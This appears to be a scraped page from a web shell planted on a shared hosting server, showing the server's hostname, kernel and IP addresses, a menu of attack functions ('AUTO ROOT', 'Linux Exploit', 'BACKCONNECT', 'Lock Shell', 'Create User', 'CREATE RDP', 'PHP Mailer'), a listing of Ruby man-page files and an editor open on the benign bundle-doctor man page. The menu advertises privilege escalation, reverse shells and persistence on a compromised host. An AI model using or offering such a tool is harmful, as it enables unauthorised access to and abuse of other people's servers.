Linux premium134.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.104 | : 216.73.216.89
Cant Read [ /etc/named.conf ]
?8.1.34
mfbsrygq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby40 /
share /
man /
man1 /
[ HOME SHELL ]
Name
Size
Permission
Action
bundle-add.1
2.79
KB
-rw-r--r--
bundle-binstubs.1
1.55
KB
-rw-r--r--
bundle-cache.1
3.74
KB
-rw-r--r--
bundle-check.1
906
B
-rw-r--r--
bundle-clean.1
726
B
-rw-r--r--
bundle-config.1
20.9
KB
-rw-r--r--
bundle-console.1
1.43
KB
-rw-r--r--
bundle-doctor.1
2.59
KB
-rw-r--r--
bundle-env.1
338
B
-rw-r--r--
bundle-exec.1
6.36
KB
-rw-r--r--
bundle-fund.1
622
B
-rw-r--r--
bundle-gem.1
6.31
KB
-rw-r--r--
bundle-help.1
448
B
-rw-r--r--
bundle-info.1
524
B
-rw-r--r--
bundle-init.1
1.14
KB
-rw-r--r--
bundle-install.1
13
KB
-rw-r--r--
bundle-issue.1
1.27
KB
-rw-r--r--
bundle-licenses.1
311
B
-rw-r--r--
bundle-list.1
1.03
KB
-rw-r--r--
bundle-lock.1
3.65
KB
-rw-r--r--
bundle-open.1
797
B
-rw-r--r--
bundle-outdated.1
3.4
KB
-rw-r--r--
bundle-platform.1
1.39
KB
-rw-r--r--
bundle-plugin.1
2.44
KB
-rw-r--r--
bundle-pristine.1
1.62
KB
-rw-r--r--
bundle-remove.1
544
B
-rw-r--r--
bundle-show.1
677
B
-rw-r--r--
bundle-update.1
13.62
KB
-rw-r--r--
bundle-version.1
618
B
-rw-r--r--
bundle.1
3.44
KB
-rw-r--r--
erb.1.gz
1.49
KB
-rw-r--r--
ruby.1.gz
8.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bundle-doctor.1
.\" generated with Ronn-NG/v0.10.1 .\" http://github.com/apjanke/ronn-ng/tree/0.10.1 .TH "BUNDLE\-DOCTOR" "1" "March 2026" "" .SH "NAME" \fBbundle\-doctor\fR \- Checks the bundle for common problems .SH "SYNOPSIS" \fBbundle doctor [diagnose]\fR [\-\-quiet] [\-\-gemfile=GEMFILE] [\-\-ssl] .br \fBbundle doctor ssl\fR [\-\-host=HOST] [\-\-tls\-version=TLS\-VERSION] [\-\-verify\-mode=VERIFY\-MODE] .br \fBbundle doctor\fR help [COMMAND] .SH "DESCRIPTION" You can diagnose common Bundler problems with this command such as checking gem environment or SSL/TLS issue\. .SH "SUB\-COMMANDS" .SS "diagnose (default command)" Checks your Gemfile and gem environment for common problems\. If issues are detected, Bundler prints them and exits status 1\. Otherwise, Bundler prints a success message and exits status 0\. .P Examples of common problems caught include: .IP "\(bu" 4 Invalid Bundler settings .IP "\(bu" 4 Mismatched Ruby versions .IP "\(bu" 4 Mismatched platforms .IP "\(bu" 4 Uninstalled gems .IP "\(bu" 4 Missing dependencies .IP "" 0 .P \fBOPTIONS\fR .TP \fB\-\-quiet\fR Only output warnings and errors\. .TP \fB\-\-gemfile=GEMFILE\fR The location of the Gemfile(5) which Bundler should use\. This defaults to a Gemfile(5) in the current working directory\. In general, Bundler will assume that the location of the Gemfile(5) is also the project's root and will try to find \fBGemfile\.lock\fR and \fBvendor/cache\fR relative to this location\. .TP \fB\-\-ssl\fR Diagnose common SSL problems when connecting to https://rubygems\.org\. .IP This flag runs the \fBbundle doctor ssl\fR subcommand with default values underneath\. .SS "ssl" If you've experienced issues related to SSL certificates and/or TLS versions while connecting to https://rubygems\.org, this command can help troubleshoot common problems\. The diagnostic will perform a few checks such as: .IP "\(bu" 4 Verify the Ruby OpenSSL version installed on your system\. .IP "\(bu" 4 Check the OpenSSL library version used for compilation\. .IP "\(bu" 4 Ensure CA certificates are correctly setup on your machine\. .IP "\(bu" 4 Open a TLS connection and verify the outcome\. .IP "" 0 .P \fBOPTIONS\fR .TP \fB\-\-host=HOST\fR Perform the diagnostic on HOST\. Defaults to \fBrubygems\.org\fR\. .TP \fB\-\-tls\-version=TLS\-VERSION\fR Specify the TLS version when opening the connection to HOST\. .IP Accepted values are: \fB1\.1\fR or \fB1\.2\fR\. .TP \fB\-\-verify\-mode=VERIFY\-MODE\fR Specify the TLS verify mode when opening the connection to HOST\. Defaults to \fBSSL_VERIFY_PEER\fR\. .IP Accepted values are: \fBCLIENT_ONCE\fR, \fBFAIL_IF_NO_PEER_CERT\fR, \fBNONE\fR, \fBPEER\fR\.
Close